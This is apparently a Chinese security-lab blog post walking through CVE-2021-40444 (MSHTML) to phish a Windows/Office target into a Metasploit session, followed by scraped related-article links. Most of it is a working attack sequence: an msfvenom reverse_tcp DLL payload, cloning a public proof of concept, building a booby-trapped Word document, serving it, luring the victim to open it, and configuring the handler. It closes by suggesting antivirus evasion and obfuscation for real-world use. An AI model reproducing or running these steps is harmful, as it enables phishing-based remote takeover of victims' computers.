利用CVE-2021-40444漏洞钓鱼执法上线MSF
0x01 漏洞描述
2021年9月8日,微软官方发布了关于MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。
Microsoft 发现,存在尝试通过特别设计的 Microsoft Office 文档利用此漏洞的针对性攻击。攻击者可制作一个由托管浏览器呈现引擎的 Microsoft Office 文档使用的恶意 ActiveX 控件。然后,攻击者必须诱使用户打开此恶意文件。
0x02 漏洞影响
漏洞编号:CVE-2021-40444
影响版本:Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本,覆盖面比较广泛,主要用于Office钓鱼。
0x03 测试环境
**攻击机:**kali-linux 2022.1
**靶机:**windows 10(office 2013)
本次漏洞使用lockedbyte师傅的POC,结合kali-linux中metersploit工具
下载地址:
(https://github.com/lockedbyte/CVE-2021-40444)
0x04 漏洞应用场景
4.1 Kali安装依赖包
sudo apt-get install lcab -y
4.2 生成含有后门的dll
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本地监听IP lport=本地监听端口 -f dll -o http.dll
下载Poc,进入CVE-2021-40444文件目录下修改exploit.py权限添加写权限,将生成的http.dll程序拷贝到Poc文件夹中并添加写权限。
sudo git clone https://github.com/lockedbyte/CVE-2021-40444
4.3 利用POC脚本生成含有恶意代码的word文件
sudo python3 exploit.py generate http.dll 本地服务器URL
含有恶意代码的Word文件生成后输出位置在out目录下。
4.4 将含有恶意代码的word文件发送给目标
进入out目录下,启动Python服务器。
python3 -m http.server 80
诱导目标用户点击含有恶意代码的word文件。
4.5 创建监听
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set LHOST 12.12.12.134 //本地监听IPLHOST => 12.12.12.134msf6 exploit(multi/handler) > set LPORT 4444 //本地监听端口LPORT => 4444msf6 exploit(multi/handler) >exploit
4.6 漏洞触发
文件启动时与服务器获取连接。
目标主机成功上线MSF。
0x05 病毒样本分析
5.1 本地杀软病毒样本检测
5.2 在线病毒样本检测
恶意文件执行流程,文件中创建了MSOSYNC.EXE进程,该进程主要收集操作系统硬件相关的指纹信息
(MachineGuid,DigitalProductId,SystemBiosDate)获取系统信息,包含查询计算机时区的功能。
5.3 样本分析详情
解压样本文件
样本文件中的document.xml.rels中存储了指向的恶意html网站链接,浏览器会自动打开网站链接。
该URL下载一个名为word.html,HTML中的JavaScript包含一个指向CAB文件的对象和一个指向INF文件的iframe. CAB文件已打开,INF文件存储在%TEMP%\Low目录中
由于CAB中存在路径遍历(ZipSlip)漏洞,因此可以将INF存储在%TEMP%中,使用“.cpl:”指令打开INF文件,导致通过rundll32侧面加载INF文件。
攻击者通过伪造cab文件内嵌含有载荷的dll文件,借助漏洞使html文件JavaScript加载含有恶意代码的dll,从而远程执行payload。
文中漏洞利用并未进行免杀处理,如在生产环境下利用时,可结合Office宏病毒等免杀系列技巧进行免杀、混淆,从而获取目标控制权限。
参考链接
https://baijiahao.baidu.com/s?id=1715778340261801914
https://github.com/lockedbyte/CVE-2021-40444
http://www.chinainfosec.org.cn/index.php?m=content&c=index&a=show&catid=57&id=488
https://blog.csdn.net/qq_43332010/article/details/120463783
https://www.ddosi.org/cve-2021-40444-exp/
声明
以上内容,均为文章作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。
长白山攻防实验室拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明长白山攻防实验室允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。
利用CVE-2021-40444漏洞钓鱼执法上线MSF相关推荐
- 使用 Metasploit 利用 OpenSSH 用户枚举漏洞 (CVE-2018-15473, CVE-2016-6210, CVE-1999-0502)
使用 Metasploit 利用 OpenSSH 用户枚举漏洞 (CVE-2018-15473, CVE-2016-6210, CVE-1999-0502) 警告 请勿将本文提到的任何技术用于非法用途 ...
- 2021 HW 漏洞清单汇总 ( 附 poc )
2021 HW 漏洞清单汇总 2021.4.8--4.22 披露时间 涉及商家/产品 漏洞描述 2021/04/08 启明星辰天清汉马USG防火墙存在逻辑缺 ...
- Zoho:尽快修复已遭利用的 ManageEngine 严重漏洞
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 商业软件提供商 Zoho 督促客户尽快将 Desktop Central 和 Desktop Central MSP 更新至最新版本. Zoho ...
- 安卓修复已遭在野利用的内核 0day 漏洞
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 谷歌安卓在2021年11月安全更新共修复了39个漏洞,其中18个位于框架和系统组件中,18个位于内核和供应商组件中. 安卓安全更新修复了一个0d ...
- 上线MSF(Metasploit)的几种常见方式
powershell上线 利用powershell上线msf 对应模块use exploit/multi/script/web_delivery use exploit/multi/script/we ...
- 利用永恒之蓝漏洞+修复方法(MS17-010)
文章目录 利用永恒之蓝漏洞+修复方法(MS17-010) 1.环境 2.信息收集 3.使用MSF的永恒之蓝模块 4.使用ms17_010模块,对靶机进行扫描 5.1使用ms17_010模块,对靶机进行 ...
- 利用DNS Zone Transfers漏洞工具dnswalk
利用DNS Zone Transfers漏洞工具dnswalk DNS Zone Transfers(DNS区域传输)是指一台备用服务器使用来自主服务器的数据刷新自己的域(zone)数据库.当主服务器 ...
- 蜜罐中利用jsonp跨域漏洞和xss漏洞的分析
一.前言 我们在打红队的时候,经常会碰到蜜罐,而更有一些"主动防御"的蜜罐中利用到了一些网站的跨域漏洞和xss,对此进行简单分析. 二.蜜罐的概念 蜜罐主要是通过布置诱饵,诱使攻击 ...
- 利用该0 day漏洞的攻击活动情况
谷歌研究人员发现macOS漏洞利用. 谷歌研究人员在macOS系统中发现了一个安全漏洞--CVE-2021-30869.攻击者利用该漏洞可以以kernel权限执行任意代码.8月底,谷歌研究人员发现了该 ...
最新文章
- 仅用 4 小时,吃透“百度太行”背后硬科技!
- 汇聚开发者星星之火,华为鸿蒙系统有希望成为国产之光?
- 《ASP.NET 开发从入门到精通》----2.3 编译和部署ASP.NET程序
- cramer定理_Lundberg-Cramer定理
- 【计算理论】不可判定性 ( 停机问题 | 图灵机语言是否空集问题 | 图灵机是否等价问题 | 是否存在自动机接受图灵机语言问题 | 莱斯定理 Rice‘s Theorem )
- vFORUM十大“最”看点,带你“撩”会议
- 力扣 136. 只出现一次的数字 【异或运算】
- linux 内网怎么安装git环境_linux 安装go环境
- 监督学习 | 集成学习 之Bagging、随机森林及Sklearn实现
- 最强大的人工智能系统 | NVIDIA DGX-2
- element 点击控制expend的显示隐藏_四、ArcGIS Runtime SDK for iOS 100.X教程系列之图层控制显示隐藏...
- 【git】LibreSSL SSL_connect: SSL_ERROR_SYSCALL in connection to github.com:443
- 更新卡片的zIndex
- 从DLL导出.a文件
- flume学习(五):使用hive来分析flume收集的日志数据
- [转载]刘继东:个人知识管理-走出去,请进来
- Intl.NumberFormat 设置数字格式
- Python优化算法01——差分进化算法
- 概念数据模型到逻辑数据模型的转化
- Scala的安装与配置
热门文章
- Goproxy(Go模块代理)的使用与配置
- 深度学习国外经典教程——大师带你入门(视频、PPT讲稿)
- WAS集群:记一次Node Agent不活动问题解决过程
- Linux下c++串口编程
- 【验证小bai】只有SV+modelsim学验证(5)——先将嗷嗷待验的DUT加入环境,至此就只遗留环境的灵魂RM了
- 2021校赛ctf write up
- Oracle Unifier 工程项目管理业务架构(含脑图)持续更新中...
- Centos 7下通过KVM安装win10
- iOS获取ipa及解压Assets.car,兼容M1
- 红帽峰会2018第一天:数字转型扛把子OpenShift